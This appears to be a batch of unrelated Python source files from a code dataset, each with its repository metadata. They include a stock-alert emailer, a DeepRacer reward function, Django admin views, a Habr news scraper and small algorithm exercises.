= Header(subject, 'utf-8') # 设置主题和格式\n try_time = 0\n try:\n #最多重试五次\n if try_time > 1:\n return\n smtpobj = smtplib.SMTP_SSL(mail_host, 465) # 本地如果有本地服务器,则用localhost ,默认端口25,腾讯的(端口465或587)\n smtpobj.set_debuglevel(1)\n smtpobj.login(mail_user, mail_pass) # 登陆QQ邮箱服务器\n smtpobj.sendmail(sender, receivers, message.as_string()) # 发送邮件\n print(\"邮件发送成功\")\n smtpobj.quit() # 退出\n except smtplib.SMTPException as e:\n print(\"Error:无法发送邮件\")\n try_time += 1\n print(e)\n\ndef get_history_data_pytdx(code, MA_DAY = 20, start = 1):\n\n #先查表\n if code in dict_code_ma.keys():\n ma = dict_code_ma[code]\n last_close = dict_code_last_close[code]\n return ma, last_close\n with api.connect('119.147.212.81', 7709):\n \"\"\"\n category: K线种类\n 0 5分钟K线 1 15分钟K线 2 30分钟K线 \n 3 1小时K线 4 日K线 5 周K线 6 月K线 \n 7 1分钟 8 1分钟K线 9 日K线 10 季K线 11 年K线\n market: 市场代码 0:深圳,1:上海\n stockcode: 证券代码\n start: 指定的范围开始位置 0表示当天\n count: 用户要请求的 K 线数目,最大值为 800\n \"\"\"\n if code[0] in ('0', '3'):\n market = 0\n else:\n market = 1\n data = api.get_security_bars(category=9, market=market, code=code, start=start, count=MA_DAY-1)\n pd_df = api.to_df(data)\n ma = pd_df['close'].mean()\n last_close = pd_df[-1:]['close'].values[0]\n\n # 对全局变量赋值 避免重复计算\n dict_code_last_close[code] = last_close\n dict_code_ma[code] = ma\n\n return ma, last_close\n\n\n# 从本地文件中读取股票的历史数据并计算MA20, 获取指定代码号的股票上一日收盘价及对应的均线信息\ndef get_history_data(code, MA_DAY=20):\n \"\"\"\n :param code: 股票代码:如:000001\n :return: 股票代码对应的数据,按照日期倒叙排好\n \"\"\"\n #首选查内存,有直接取数据,读表计算\n if code in dict_code_ma.keys():\n ma = dict_code_ma[code]\n last_close = dict_code_last_close[code]\n return ma, last_close\n base_dir = r\"E:\\deeplearning\\stock-data-validation\\data\\base_data_csv\"\n code_data_file = os.path.join(base_dir, code + \".csv\")\n code_data_df = pd.read_csv(code_data_file, names=[\"date\", \"OPEN\", \"HIGH\", \"LOW\", \"CLOSE\", \"VOLUME\"])\n code_data_df[\"date\"] = code_data_df[\"date\"].apply(int)\n code_data_df = code_data_df.sort_values(by=[\"date\"], axis=0, ascending=False)[: MA_DAY-1]\n last_close = code_data_df.values.tolist()[0][4]\n ma = code_data_df[\"CLOSE\"].mean()\n #对全局变量赋值 避免重复计算\n dict_code_last_close[code] = last_close\n dict_code_ma[code] = ma\n return ma, last_close\n\n\ndef get_now_data(code_list):\n # 新浪 ['sina'] 腾讯 ['tencent', 'qq']\n mail = random.sample([\"tencent\", \"sina\", \"qq\"], k=1)[0]\n try:\n quotation = easyquotation.use(mail)\n\n # 获取所有股票行情\n quotation.market_snapshot(prefix=False) # prefix 参数指定返回的行情字典中的股票代码 key 是否带 sz/sh 前缀\n # 单只股票\n # quotation.real(code) # 支持直接指定前缀,如 'sh000001'\n # 多只股票\n # quotation.stocks(['000001', '162411'])\n return quotation.stocks(code_list)\n\n except Exception as err:\n time_error = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n print(\"频繁请求:报错时间:{}\".format(time_error))\n time.sleep(2)\n err_log = traceback.format_exc()\n print(str(err_log))\n return {}\n\n\n# 读取自选股中历史数据\ndef get_zixuan_data():\n \"\"\"\n :return: 返回战法对应的选股股票 key 为日期 如 20210714 value 为当天选出来的股票 一个list ; 如{\"20210804\":[000001,600003]}\n \"\"\"\n # 自选文件夹\n data_file_dir = r\"D:\\tdx\\T0002\\blocknew\"\n file_path = os.path.join(data_file_dir, \"ZXG.blk\")\n with open(file_path, encoding=\"utf-8\") as f:\n code_str = f.readlines()\n # 只返回股票,不返回基金\n code_list = [str(elem).strip()[1:7] for elem in code_str if len(elem) > 2 and str(elem)[1] in ('0', '3', '6')]\n return code_list\n\n\nif __name__ == \"__main__\":\n\n code_list = get_zixuan_data()\n\n have_code_list = []\n zixuan_list = []\n for i, code in enumerate(code_list):\n if code != \"159949\":\n have_code_list.append(code)\n else:\n if i < len(code_list)-1:\n zixuan_list = code_list[i+1:]\n break\n\n print(\"您的持仓股为:{}\".format(\",\".join(have_code_list)))\n print(\"您的自选股为:{}\".format(\",\".join(zixuan_list)))\n\n dt = get_format_day(0)\n morning_begin_time = dt + \" \" + \"09:25:00\"\n morning_end_time = dt + \" \" + \"11:30:00\"\n afternoon_begin_time = dt + \" \" + \"13:00:00\"\n afternoon_end_time = dt + \" \" + \"15:00:00\"\n time_stamp_begin_1 = time.mktime(time.strptime(morning_begin_time, '%Y-%m-%d %H:%M:%S'))\n time_stamp_end_1 = time.mktime(time.strptime(morning_end_time, '%Y-%m-%d %H:%M:%S'))\n time_stamp_begin_2 = time.mktime(time.strptime(afternoon_begin_time, '%Y-%m-%d %H:%M:%S'))\n time_stamp_end_2 = time.mktime(time.strptime(afternoon_end_time, '%Y-%m-%d %H:%M:%S'))\n\n # 9:25---15:00\n now_time = int(time.time())\n while True: # time_stamp_begin_1 < now_time < time_stamp_end_2:\n now_time = int(time.time())\n\n # 9:30 以前 or 15:00 以后\n while now_time < time_stamp_end_1 or now_time > time_stamp_begin_2:\n time.sleep(30)\n now_time = int(time.time())\n\n # 11:30 - 13:00\n while time_stamp_end_1 < now_time < time_stamp_begin_2:\n time.sleep(3)\n now_time = int(time.time())\n\n # 统计已发送邮件的次数,超过100 停止运行\n send_times = 0\n for _, t in send_email_times.items():\n send_times += t\n if send_times > 100:\n break\n\n ma_day = 20\n now_have_data_dict = get_now_data(have_code_list)\n if len(now_have_data_dict) == 0:\n\n time.sleep(10)\n continue\n # 持有的股票 ,涨幅超过五个点提醒, 跌幅超过三个点,跌破二十日线提醒\n for code in have_code_list:\n ma, last_close = get_history_data_pytdx(code, ma_day)\n now_price = now_have_data_dict[code]['now']\n name = now_have_data_dict[code]['name']\n ma_price = (ma * (ma_day - 1) + now_price) / ma_day\n\n if last_close*0.97 >= now_price:\n times = send_email_times.get(code, 0)\n if times <= 2:\n send_email(\"【雪球邮件订阅】\", \"您的持仓:【{}】跌幅超过 3%, 请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n\n if last_close*1.05 <= now_price:\n times = send_email_times.get(code, 0)\n if times <= 2:\n send_email(\"【雪球邮件订阅】\", \"您的持仓:【{}】涨幅超过 5%,请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n # 昨日还在均线之上,今日跌破提醒, 昨日就在均线之下 不用提醒\n if now_price <= ma_price and (last_close - ma_price)/ma_price >= 0.01:\n times = send_email_times.get(code, 0)\n if times <= 2:\n send_email(\"【雪球邮件订阅】\", \"您的持仓:【{}】跌破均线,请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n\n print(\"持仓监控完毕\")\n # 自选股下跌提醒\n now_zixuan_data_dict = get_now_data(zixuan_list)\n\n if len(now_zixuan_data_dict) == 0:\n time.sleep(10)\n continue\n\n for code in zixuan_list:\n ma, last_close = get_history_data_pytdx(code, MA_DAY=ma_day)\n now_price = now_zixuan_data_dict[code]['now']\n open_price = now_zixuan_data_dict[code]['open']\n ma_price = (ma * (ma_day - 1) + now_price) / ma_day\n name = now_zixuan_data_dict[code][\"name\"]\n\n if now_price <= last_close * 0.95:\n times = send_email_times.get(code, 0)\n if times <= 3:\n send_email(\"【雪球邮件订阅】\", \"您关注的【{}】跌幅超过 5%,请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n\n if now_price <= last_close * 0.965:\n times = send_email_times.get(code, 0)\n if times == 0:\n send_email(\"【雪球邮件订阅】\", \"您关注的【{}】跌幅超过 3.5%,请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n\n if abs((now_price - ma_price)/ma_price) <= 0.02 and (last_close - ma_price)/ma_price >= 0.02:\n times = send_email_times.get(code, 0)\n if times <= 2:\n send_email(\"【雪球邮件订阅】\", \"您关注的【{}】回落20均线附近, 请火速关注\".format(name))\n else:\n send_email_times[code] += 1\n now_time = int(time.time())\n time.sleep(1)\n print(\"自选监控完毕\")\n\n # 下午三点之后, 九点半之前\n # now_time = int(time.time())\n # if now_time > time_stamp_end_2 or now_time < time_stamp_begin_1:\n # print(\"非交易时间休息5分钟\")\n # time.sleep(60 * 5)\n\n","repo_name":"testinWang/backtrade","sub_path":"util/StockReceive.py","file_name":"StockReceive.py","file_ext":"py","file_size_in_byte":11626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379745707","text":"from absl.testing import absltest\nimport numpy as np\nfrom open_spiel.python import rl_environment\nfrom open_spiel.python.algorithms import random_agent\n\n\nclass RandomAgentTest(absltest.TestCase):\n\n def test_step(self):\n agent = random_agent.RandomAgent(player_id=0, num_actions=10)\n\n legal_actions = [0, 2, 3, 5]\n time_step = rl_environment.TimeStep(\n observations={\n \"info_state\": [[0], [1]],\n \"legal_actions\": [legal_actions, []],\n \"current_player\": 0\n },\n rewards=None,\n discounts=None,\n step_type=None)\n agent_output = agent.step(time_step)\n\n self.assertIn(agent_output.action, legal_actions)\n self.assertAlmostEqual(sum(agent_output.probs), 1.0)\n self.assertEqual(\n len([x for x in agent_output.probs if x > 0]), len(legal_actions))\n self.assertTrue(\n np.allclose(agent_output.probs[legal_actions], [.25] * 4, atol=1e-5))\n\n\nif __name__ == \"__main__\":\n absltest.main()\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/algorithms/random_agent_test.py","file_name":"random_agent_test.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"32625859565","text":"# Solution to the smallest difference problem\n\n# Looks like the difference we're considering is absolute\n# Pointer movement should ensure that this difference is a small as possible\n\n# O(n lg n + m lg m) time | O(1) space\ndef smallest_difference(arr1, arr2):\n arr1.sort()\n arr2.sort()\n\n first = 0 # Pointer to arr1\n second = 0 # Pointer to arr2\n\n while first < len(arr1) and second < len(arr2):\n difference = abs(arr1[first] - arr2[second])\n\n if abs(arr1[first+1] - arr2[second]) < difference:\n first += 1\n \n elif abs(arr1[first] - arr2[second+1]) < difference:\n second += 1\n \n else:\n break\n \n return [arr1[first], arr2[second]]\n\n\nif __name__ == \"__main__\":\n arr1 = [-1, 5, 10, 20, 28, 3]\n arr2 = [26, 134, 135, 15, 17]\n\n result = smallest_difference(arr1, arr2)\n\n assert result == [28, 26], \"Not quite there yet.\"\n\n print(\"You're all set!\")","repo_name":"tobeyOguney/Zoo-of-Algorithms","sub_path":"Smallest Difference/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"71264940267","text":"from __future__ import unicode_literals\n\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse\nfrom django.http.response import HttpResponseRedirect\nfrom django.utils.encoding import force_text\nfrom django.utils.translation import ugettext as _\nfrom django.views.generic import DetailView\n\nfrom shoop.admin.toolbar import PostActionButton, Toolbar, URLActionButton\nfrom shoop.admin.utils.urls import get_model_url\nfrom shoop.apps.provides import get_provide_objects\nfrom shoop.core.models import Order, OrderStatus, OrderStatusRole\nfrom shoop.utils.excs import Problem\n\n\nclass OrderDetailView(DetailView):\n model = Order\n template_name = \"shoop/admin/orders/detail.jinja\"\n context_object_name = \"order\"\n\n def get_toolbar(self):\n order = self.object\n toolbar = Toolbar()\n toolbar.append(URLActionButton(\n text=_(\"Create Shipment\"),\n icon=\"fa fa-truck\",\n disable_reason=_(\"There are no products to ship\") if not order.get_unshipped_products() else None,\n url=reverse(\"shoop_admin:order.create-shipment\", kwargs={\"pk\": order.pk}),\n extra_css_class=\"btn-info\"\n ))\n\n toolbar.append(PostActionButton(\n post_url=reverse(\"shoop_admin:order.set-status\", kwargs={\"pk\": order.pk}),\n name=\"status\",\n value=OrderStatus.objects.get_default_complete().pk,\n text=_(\"Set Complete\"),\n icon=\"fa fa-check-circle\",\n disable_reason=(\n _(\"This order can not be set as complete at this point\")\n if not order.can_set_complete()\n else None\n ),\n extra_css_class=\"btn-success\"\n ))\n\n for button in get_provide_objects(\"admin_order_toolbar_button\"):\n toolbar.append(button(order))\n\n return toolbar\n\n def get_context_data(self, **kwargs):\n context = super(OrderDetailView, self).get_context_data(**kwargs)\n context[\"toolbar\"] = self.get_toolbar()\n context[\"title\"] = force_text(self.object)\n return context\n\n\nclass OrderSetStatusView(DetailView):\n model = Order\n\n def get(self, request, *args, **kwargs):\n return HttpResponseRedirect(get_model_url(self.get_object()))\n\n def post(self, request, *args, **kwargs):\n order = self.object = self.get_object()\n new_status = OrderStatus.objects.get(pk=int(request.POST[\"status\"]))\n if new_status.role == OrderStatusRole.COMPLETE and not order.can_set_complete():\n raise Problem(_(\"Unable to set order as completed at this point\"))\n old_status = order.status\n order.status = new_status\n order.save(update_fields=(\"status\",))\n message = _(\"Order status changed: %s to %s\") % (old_status, new_status)\n order.add_log_entry(message, user=request.user, identifier=\"status_change\")\n messages.success(self.request, message)\n\n return HttpResponseRedirect(get_model_url(self.get_object()))\n","repo_name":"if413019/ShoopDevelopment","sub_path":"shoop/admin/modules/orders/views/detail.py","file_name":"detail.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38121303698","text":"import os\nfrom setuptools import (\n find_packages,\n setup,\n)\n\nversion = {}\nwith open(\"./oidc_provider/version.py\") as fp:\n exec(fp.read(), version)\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nsetup(\n name='django-oidc-provider',\n version=version['__version__'],\n packages=find_packages(),\n include_package_data=True,\n license='MIT License',\n description='OpenID Connect Provider implementation for Django.',\n long_description='http://github.com/juanifioren/django-oidc-provider',\n url='http://github.com/juanifioren/django-oidc-provider',\n author='Juan Ignacio Fiorentino',\n author_email='juanifioren@gmail.com',\n zip_safe=False,\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: 3.10',\n 'Programming Language :: Python :: 3.11',\n 'Topic :: Internet :: WWW/HTTP',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n test_suite='runtests.runtests',\n tests_require=[\n 'pyjwkest>=1.3.0',\n 'mock>=2.0.0',\n ],\n\n install_requires=[\n 'pyjwkest>=1.3.0',\n ],\n)\n","repo_name":"juanifioren/django-oidc-provider","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":386,"dataset":"github-code","pt":"37"} +{"seq_id":"72039865066","text":"import numpy as np\nimport cv2\n \nim = cv2.imread('amundi.jpg')\nimgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)\nret,thresh = cv2.threshold(imgray,127,255,0)\ncontours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n\n\ncv2.drawContours(im,contours,-1,(0,255,0),3)\n\ncv2.imwrite(\"res.jpg\", im)\n","repo_name":"fduraffourg/utils","sub_path":"opencv/contours.py","file_name":"contours.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"73989668586","text":"'''\nDavide Denicolò\nN° matricola 0000879677\nTraccia Numero 2 Progetto di Programmazione a oggetti.\nSi immagini di dover realizzare un Web Server in Python per\nuna azienda ospedaliera. I requisiti del Web Server sono i\nseguenti:\n• Il web server deve consentire l’accesso a più utenti in contemporanea\n• La pagina iniziale deve consentire di visualizzare la lista\ndei servizi erogati dall’azienda ospedaliera e per ogni\nservizio avere un link di riferimento ad una pagina\ndedicata.\n• L’interruzione da tastiera (o da console) dell’esecuzione\ndel web server deve essere opportunamente gestita in\nmodo da liberare la risorsa socket.\n• Nella pagina principale dovrà anche essere presente un\nlink per il download di un file pdf da parte del browser\n• Come requisito facoltativo si chiede di autenticare gli\nutenti nella fase iniziale della connessione.\n'''\n\n\nimport signal\nimport sys\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom socketserver import ThreadingMixIn\nfrom datetime import datetime\nimport pytz\nimport feedparser\n\n#Creazione dell'Handler per gestire le richieste GET dal client.\nclass Serv(BaseHTTPRequestHandler):\n\n def do_GET(self):\n if self.path == '/':\n self.path = '/index.html'\n try:\n if self.path == '/notizie.html':\n feed_creator()\n file_to_open = open(self.path[1:]).read()\n self.send_response(200)\n print(\"E' arrivata una richiesta al server\")\n except:\n file_to_open = \"File not found\"\n self.send_response(404)\n self.end_headers()\n self.wfile.write(bytes(file_to_open, 'utf-8'))\n\n\n# Indica la porta ove lavorare, di default sarà la 8081.\nif sys.argv[1:]:\n port = int(sys.argv[1])\nelse:\n port = 8081\n\n\n#Varie variabili HTML.\nfooter = \"\"\"\n \n\n\"\"\"\n\nheader_html = \"\"\"\n\n \n \n \n \n Sezione notizie salute\n\"\"\"\n\nnavigation_bar = \"\"\"\n\n\n\n
\n
\n
\n

\n \n\"\"\".format(port=port)\n\n\n#Funzione che mi permette di aggiungere le informazioni riguardo a un singolo RSS in una variabile messaggio.\n#Ci andrò poi ad aggiungere dei tag html poiche finirà in un file HTML apposito.\ndef add_element(i, message, title, desc, link, info):\n if i == 0:\n now_italy = pytz.timezone('Europe/Rome')\n current_time = datetime.now(now_italy)\n message = \"

\" + current_time.strftime(\"%H:%M:%S\") + \"

\"\n message = message \\\n + \"

\" + title + \"


\" \\\n + \"

\" + desc + \"
\" \\\n + \"\" + link + \"
\" \\\n + info + \"


\"\n return message\n\n\n#Creo ufficialmente la pagina che espone le notizie.\ndef home_creator(message):\n f = open('notizie.html', 'w', encoding=\"utf-8\")\n f.write(header_html + \"

Notizie | Home

\"\n + navigation_bar + \"
\" + message + footer)\n f.close()\n \n#Funzione che permette di prendere le RSS dal corriere\n#Mano a mano che leggo le notizie le formatto in un formato HTML e le scrivo sul file html Notizie.html.\ndef feed_creator():\n feed = feedparser.parse(\"https://xml2.corriereobjects.it/rss/salute.xml\")\n\n message = ''\n i = 0\n for entry in feed.entries:\n article_title = entry.title\n article_desc = entry.description\n article_link = entry.link\n article_info = entry.category\n\n message = add_element(i, message, article_title, article_desc, article_link, article_info)\n if i == 0:\n i += 1\n\n f = open('notizie.html', 'w', encoding=\"utf-8\")\n f.write(message)\n f.close()\n\n home_creator(message)\n\n#Gestione del segnale di uscita, quando si preme CTRL-C si deallocheranno le risorse.\ndef signal_handler(signal, frame):\n print('Exiting http server (Ctrl+C pressed)')\n try:\n if server:\n server.server_close()\n finally:\n sys.exit(0)\n\n\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\n \"\"\"Gestisco le richieste in un altro thread.\"\"\"\n\n#Eseguo il main.\nif __name__ == '__main__':\n server = ThreadedHTTPServer(('localhost', port), Serv)\n print('Starting server, use to stop')\n signal.signal(signal.SIGINT, signal_handler)\n feed_creator()\n server.serve_forever()\n\n\n\n\n\n\n","repo_name":"davidedenicolo99/progReti","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24076388521","text":"import math\n\n\ndef reward_function(params):\n limit_params = {\n 'optimal_speed': 2.5,\n 'standard_speed': 1.5,\n 'minimum_speed': 1.0,\n 'steering_limit': 10.0,\n 'straight_line_direction_limit': 5.0,\n 'optimal_reward_l1': 2.5,\n 'optimal_reward_l2': 1.8,\n 'standard_reward_l1': 1.5,\n 'standard_reward_l2': 0.9,\n 'minimum_reward_l1': 0.6,\n 'minimum_reward_l2': 0.3,\n 'steps_per_second': 15\n }\n\n x = params['x']\n y = params['y']\n on_track = params['all_wheels_on_track']\n distance_from_center = params['distance_from_center']\n track_width = params['track_width']\n steering = params['steering_angle']\n speed = params['speed']\n waypoints = params['waypoints']\n closest_waypoints = params['closest_waypoints']\n heading = params['heading']\n is_left_of_center = params['is_left_of_center']\n\n reward = 1e-3\n\n # get the next 3 points\n np = waypoints[closest_waypoints[1]]\n np1 = waypoints[(closest_waypoints[1] + 1) % len(waypoints)]\n np2 = waypoints[(closest_waypoints[1] + 2) % len(waypoints)]\n\n # distance checking to make sure the agent is heading to the right direction\n distance_p0 = distance_of_2points(waypoints[closest_waypoints[0]], [x, y])\n distance_p = distance_of_2points(np, [x, y])\n distance_p1 = distance_of_2points(np1, [x, y])\n distance_p2 = distance_of_2points(np2, [x, y])\n\n # projected position of the agent\n new_x = x + speed / limit_params['steps_per_second'] * math.cos(\n math.radians(heading + steering / limit_params['steps_per_second']))\n new_y = y + speed / limit_params['steps_per_second'] * math.sin(\n math.radians(heading + steering / limit_params['steps_per_second']))\n\n new_distance_p0 = distance_of_2points(waypoints[closest_waypoints[0]], [new_x, new_y])\n new_distance_p = distance_of_2points(np, [new_x, new_y])\n new_distance_p1 = distance_of_2points(np1, [new_x, new_y])\n new_distance_p2 = distance_of_2points(np2, [new_x, new_y])\n\n agent_going_to_right_direction = False\n if distance_p0 <= new_distance_p0 and distance_p1 >= new_distance_p1 and distance_p2 >= new_distance_p2:\n agent_going_to_right_direction = True\n\n # the agent direction to next 3 points\n direction_np = directions_of_2points([x, y], np)\n direction_np1 = directions_of_2points([x, y], np1)\n direction_np2 = directions_of_2points([x, y], np2)\n\n direction_np_diff = abs(direction_np - heading - steering / limit_params['steps_per_second'])\n if direction_np_diff > 180:\n direction_np = 360 - direction_np\n\n direction_np1_diff = abs(direction_np1 - heading - steering / limit_params['steps_per_second'])\n if direction_np1_diff > 180:\n direction_np1 = 360 - direction_np1\n\n direction_np2_diff = abs(direction_np2 - heading - steering / limit_params['steps_per_second'])\n if direction_np2_diff > 180:\n direction_np2 = 360 - direction_np2\n\n direction_np2_np_diff = abs(direction_np2 - direction_np)\n if direction_np2_np_diff > 180:\n direction_np2_np_diff = 360 - direction_np2_np_diff\n\n if agent_going_to_right_direction and on_track:\n if speed >= limit_params['optimal_speed']:\n if (is_left_of_center and 0 >= steering / limit_params['steps_per_second'] >= -1 * limit_params[\n 'steering_limit']) or \\\n (not is_left_of_center and 0 <= steering / limit_params['steps_per_second'] <= limit_params[\n 'steering_limit']):\n if direction_np1_diff <= limit_params['straight_line_direction_limit']:\n reward = limit_params['optimal_reward_l1']\n elif direction_np1_diff <= direction_np2_np_diff:\n reward = limit_params['optimal_reward_l2']\n elif speed >= limit_params['standard_speed']:\n if direction_np1_diff <= limit_params['straight_line_direction_limit']:\n reward = limit_params['standard_reward_l1']\n elif direction_np1_diff <= direction_np2_np_diff:\n reward = limit_params['standard_reward_l2']\n elif speed >= limit_params['minimum_speed']:\n if direction_np1_diff <= limit_params['straight_line_direction_limit']:\n reward = limit_params['minimum_reward_l1']\n elif direction_np1_diff <= direction_np2_np_diff:\n reward = limit_params['minimum_reward_l2']\n\n return float(reward)\n\n\ndef reward_function_maximum(params):\n # track_width = params['track_width']\n # waypoints = params['waypoints']\n # closest_waypoints = params['closest_waypoints']\n # steps = params['steps']\n # progress = params['progress']\n #\n # x = waypoints[closest_waypoints[1]][0]\n # y = waypoints[closest_waypoints[1]][1]\n # distance_from_center = 0.0\n # steering_angle = 0.0\n # speed = 4.0\n # heading = directions_of_2points(waypoints[closest_waypoints[0]], waypoints[closest_waypoints[1]])\n # is_left_of_center = True\n # on_track = True\n #\n # maximum_params = {\n # 'track_width': track_width,\n # 'waypoints': waypoints,\n # 'closest_waypoints': closest_waypoints,\n # 'steps': steps,\n # 'progress': progress,\n # 'x': x,\n # 'y': y,\n # 'distance_from_center': distance_from_center,\n # 'steering_angle': steering_angle,\n # 'speed': speed,\n # 'heading': heading,\n # 'is_left_of_center': is_left_of_center,\n # 'all_wheels_on_track': on_track\n # }\n\n # reward = reward_function(maximum_params)\n reward = 2.5\n\n return float(reward)\n\n\ndef minimum_reward(params):\n track_width = params['track_width']\n waypoints = params['waypoints']\n closest_waypoints = params['closest_waypoints']\n steps = params['steps']\n progress = params['progress']\n\n x = waypoints[closest_waypoints[1]][0] + track_width\n y = waypoints[closest_waypoints[1]][1] + track_width\n distance_from_center = 0.5 * track_width\n steering_angle = 30\n speed = 0.1\n heading = -1 * directions_of_2points(waypoints[closest_waypoints[0]], waypoints[closest_waypoints[1]])\n is_left_of_center = True\n on_track = False\n\n minimum_params = {\n 'track_width': track_width,\n 'waypoints': waypoints,\n 'closest_waypoints': closest_waypoints,\n 'steps': steps,\n 'progress': progress,\n 'x': x,\n 'y': y,\n 'distance_from_center': distance_from_center,\n 'steering_angle': steering_angle,\n 'speed': speed,\n 'heading': heading,\n 'is_left_of_center': is_left_of_center,\n 'all_wheels_on_track': on_track\n }\n\n reward = reward_function(minimum_params)\n\n return float(reward)\n\n\ndef distance_of_2points(p1, p2):\n return ((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2) ** 0.5\n\n\ndef directions_of_2points(p1, p2):\n directions = math.atan2(p2[1] - p1[1], p2[0] - p1[0])\n directions = math.degrees(directions)\n return directions\n","repo_name":"Genral0113/myPython","sub_path":"aws_deepracer/track2019v1.py","file_name":"track2019v1.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30721301909","text":"# Approach 1 - Recursive\n# O(N), O(H)\nclass Solution:\n def isSameTree(self, p: Optional[TreeNode], q: Optional[TreeNode]) -> bool:\n if not p or not q:\n return p == q\n\n sameSoFar = (p.val == q.val)\n\n return sameSoFar and self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)\n\n\n# Approach 2 - Iterative\n# The trick here is to store the null values in the queue, if you ignore them it will be wrong\n# Consider [1, null, 2] and [1, 2, null] - If you don't store null it will be True and that's wrong\n# O(N), O(N)\nclass Solution:\n def isSameTree(self, p: Optional[TreeNode], q: Optional[TreeNode]) -> bool:\n q = collections.deque([(p, q)])\n while len(q) != 0:\n i, j = q.popleft()\n if not i and not j:\n continue\n if not i or not j:\n return False\n if i.val != j.val:\n return False\n\n q.append([i.left, j.left])\n q.append([i.right, j.right])\n return True\n","repo_name":"nikhiljsk/Strivers_SDE_Sheet","sub_path":"18_Binary_Tree_Part_II/18.6_Check_if_two_trees_are_identical_or_not.py","file_name":"18.6_Check_if_two_trees_are_identical_or_not.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"7250379402","text":"import pandas as pd\n\nfrom stock.train import add_put_call_features, add_ticker_features\nfrom common.lgb import LGBModel\n\ndef main():\n path = 'data'\n df = pd.read_csv(f'{path}/spy.csv')\n add_ticker_features(df, 'spy')\n df = add_put_call_features(df, path)\n df.dropna(inplace=True)\n\n feat_cols = []\n for c in df.columns:\n if c.startswith('spy_d') or c.startswith('pc_'):\n feat_cols.append(c)\n\n train_end = int(len(df) * 3 / 5)\n model = LGBModel('pc_spy_lgb', path, 'timestamp', 'target', 5, feat_cols)\n model.predict(df.iloc[train_end:])\n\n print('done')\n\nif __name__ == '__main__':\n main()","repo_name":"looselyconnected/fastai","sub_path":"stock/pc_spy_pred.py","file_name":"pc_spy_pred.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6113144242","text":"\nfrom datetime import datetime, timedelta\nimport locale\nimport platform\nfrom bs4 import BeautifulSoup\n\nfrom webapp.news.parsers.utils import get_html, save_news\nfrom webapp.db import db\nfrom webapp.news.models import News\n\n\n\nif platform.system() == 'Windows':\n locale.setlocale(locale.LC_ALL, \"russian\")\nelse:\n locale.setlocale(locale.LC_TIME, 'ru_RU')\n\n\ndef parse_habr_date(date_str):\n\tif \"сегодня\" in date_str:\n\t\ttoday = datetime.now()\n\t\tdate_str = date_str.replace(\"сегодня\", today.strftime('%d %B %Y'))\n\telif \"вчера\" in date_str:\n\t\tyesterday = datetime.now() - timedelta(days=1)\n\t\tdate_str = date_str.replace(\"вчера\", yesterday.strftime('%d %B %Y'))\n\ttry:\n\t\treturn datetime.strptime(date_str, '%d %B %Y в %H:%M')\n\texcept ValueError:\n\t\treturn datetime.now()\n\n\ndef get_habr_snippets():\n html = get_html('https://habr.com/ru/search/?target_type=posts&q=python&order_by=date')\n if html:\n soup = BeautifulSoup(html, 'html.parser')\n all_news = soup.find('ul', class_='content-list_posts').findAll('li', class_='content-list__item_post')\n for news in all_news:\n title = news.find('a', class_=\"post__title_link\").text\n url = news.find('a', class_=\"post__title_link\")[\"href\"]\n published = news.find('span', class_='post__time').text\n published = parse_habr_date(published)\n save_news(title, url, published)\n\n\ndef get_news_content():\n news_without_text = News.query.filter(News.text.is_(None))\n for news in news_without_text:\n html = get_html(news.url)\n if html:\n soup = BeautifulSoup(html, 'html.parser')\n article = soup.find('div', class_='post__text-html').decode_contents()\n if article:\n news.text = article\n db.session.add(news)\n db.session.commit()","repo_name":"Sinrez/learn_python_course","sub_path":"web_module_blurprint/webapp/news/parsers/habr.py","file_name":"habr.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"23426573293","text":"from flask 